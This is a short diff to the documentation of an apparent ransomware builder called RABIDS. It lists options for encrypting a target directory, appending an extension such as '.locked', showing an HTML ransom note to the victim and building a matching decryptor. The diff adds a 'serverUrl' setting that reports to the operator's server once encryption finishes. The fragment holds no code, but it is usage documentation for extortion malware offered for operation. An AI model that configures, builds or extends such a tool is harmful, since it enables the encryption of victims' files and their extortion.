sarwarerror/RABIDS/DOC.md

 - `extension`: The file extension to append to encrypted files (e.g., `.locked`).
 - `targetDir`: The directory whose contents will be encrypted.
 - `htmlContent`: The HTML content of the ransom note that will be displayed to the victim.
+- `serverUrl`: Your HTTP server URL for notifications.
 - `decrypt` (Internal): Set to `true` to build a decryptor instead of an encryptor.
 This is used by the "UNKRASH" tab.

+**Note:** After encryption completes, the module sends a notification to your HTTP server.

 ---